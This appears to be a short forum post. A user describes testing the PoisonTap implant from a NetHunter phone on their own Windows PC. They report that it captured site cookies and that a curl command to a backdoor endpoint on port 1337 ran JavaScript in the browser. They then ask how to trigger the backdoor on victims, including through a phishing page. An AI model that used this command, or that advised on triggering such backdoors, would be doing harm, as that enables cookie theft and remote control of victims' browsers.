backdoor test succeed,But there's still a question

[double-pulsar]

my device is nethunter nexus6p I plug posiontap into my win8.1 and it have open browser. the browser open the sites like youku.com,msn.com then nexus6p appear cookies of site when my browser open http://youku.com/PosionTap. It was empty,and I send curl 'http://my ip:1337/exec?alert("muahahahaha")' the browser pop "muahahahaha" succeed so,when i want to use the backdoor,did I must insert a frame into the phishing page then let the victim visit it? Can I use other methods to actively trigger the backdoor? please help me,thx!